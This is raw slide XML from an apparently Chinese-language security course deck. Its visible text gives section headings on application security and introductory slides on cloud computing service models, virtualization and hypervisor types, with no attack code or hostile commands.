                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Freeform 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81EE8B92-F1A9-3B4E-A342-A573286D1E97}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1328245" y="2099747"/>
              <a:ext cx="277795" cy="288100"/>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grpFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB81CDE2-FBAB-EB4F-81B1-BDC2F11131D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5808237" y="3827357"/>
            <a:ext cx="4150495" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a: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节 应用安全的本质及原因</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EA19E80-D427-ED4F-864E-D799B3254AF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5349841" y="4546082"/>
            <a:ext cx="387116" cy="387116"/>
            <a:chOff x="1123642" y="1900296"/>
            <a:chExt cx="687003" cy="687003"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="76200" dir="13500000" sy="23000" kx="1200000" algn="br" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="20000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Oval 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{389945AC-ED8F-2849-8686-F276067125F6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1123642" y="1900296"/>
              <a:ext cx="687003" cy="687003"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">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3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Freeform 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C2274B4-FC09-D54A-88EB-6D372C7F5BF2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1328245" y="2099747"/>
              <a:ext cx="277795" cy="288100"/>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grpFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2F85265-8D34-1947-8D96-6C0D240EA158}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5808236" y="4525636"/>
            <a:ext cx="4458272" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a: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节 应用安全的基本防御原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F5D7B92-448A-40C9-90FA-1C0BBC9E7485}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5347597" y="5182585"/>
            <a:ext cx="387116" cy="387116"/>
            <a:chOff x="1123642" y="1900296"/>
            <a:chExt cx="687003" cy="687003"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:effectLst>
            <a:outerShdw blurRad="76200" dir="13500000" sy="23000" kx="1200000" algn="br" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="20000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Oval 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C35AF4DC-A1C9-4BF7-867A-2D25E63F48B0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1123642" y="1900296"/>
              <a:ext cx="687003" cy="687003"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">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3200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Freeform 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1287B2EC-5727-4259-863E-4C32A5DBB6C4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1328245" y="2099747"/>
              <a:ext cx="277795" cy="288100"/>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grpFill/>
            <a:ln>
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6742086-0317-4088-821D-9BBBC7CD5E13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5805992" y="5162139"/>
            <a:ext cx="2919389" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>节 典型案例分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40683071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2.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>云计算安全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92305" y="2265463"/>
            <a:ext cx="4845747" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>云计算的定义：即通过网络按需提供可动态伸缩的廉价计算服务。是与信息技术、软件、互联网相关的一种服务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>大规模</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>虚拟化</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>高可用性和扩展性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>按需服务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全网络安全</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6150" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{392CA31D-E134-1446-A07D-9CC66A99E1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73324" y="1315427"/>
            <a:ext cx="5870184" cy="53163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61941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2.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>云计算安全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24827" y="2596249"/>
            <a:ext cx="4845747" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>服务类型可以分为三类：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）、基础设施即服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>IaaS(Infrastructure as a service)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" dirty="0"/>
              <a:t>）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>平台即服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>PaaS(platform as a service)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en" dirty="0"/>
              <a:t>）、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>软件即服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
              <a:t>SaaS(software as a service)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en" altLang="zh-CN" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en" altLang="zh-CN" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA4ECC92-9A66-6845-8161-E243F8B571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5791" y="1319132"/>
            <a:ext cx="5224596" cy="48632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89670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2.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>云计算安全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1131376" y="2140134"/>
            <a:ext cx="4845747" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>虚拟化是为一些组件（例如虚拟应用、服务器、存储和网络）创建基于软件的（或虚拟）表现形式的过程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>虚拟计算机系统称为“虚拟机”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(VM)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，它是一种严密隔离且内含操作系统和应用的软件容器</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表面来看，这些虚拟机都是独立的服务器，但实际上，它们共享物理服务器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、内存、硬件、网卡等资源</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47AB2B96-CAD3-4F25-B8FA-819922BF55FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6956573" y="2296582"/>
            <a:ext cx="3829050" cy="2428875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15504750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2.4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>云计算安全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742386" y="2074492"/>
            <a:ext cx="4845747" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>Hypervisor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，又称</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0"/>
              <a:t>虚拟机监视器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（英语：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>virtual machine monitor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，缩写为 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>VMM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>），是用来建立与执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>虚拟机器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的软件、固件或硬件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第一类，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hypervisor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>直接运行在物理机之上。虚拟机运行在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hypervisor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>之上，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>VMware vSphere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>VMware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1"/>
              <a:t>ESXi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第二类，物理机上安装正常的操作系统（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>），然后在正常操作系统上安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hypervisor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，生成和管理虚拟机，如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>VMware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0"/>
              <a:t>KVM</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 2" descr="https://pic1.zhimg.com/80/v2-737ff40498d1fea1a4e5c37b7bfec624_720w.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74BEA351-2AE6-46B2-98CB-931881A172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7557" y="1126717"/>
            <a:ext cx="5643286" cy="309597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pic1.zhimg.com/80/v2-4d4c58c6fa760ed8bbd207b7cfb1d00c_720w.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{116BF1D8-AA9A-41E0-B686-C4AB37E31D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2588" y="4570440"/>
            <a:ext cx="2212368" cy="158737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pic3.zhimg.com/80/v2-a90b39f9d6c5cda01e17c359460d17d6_720w.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
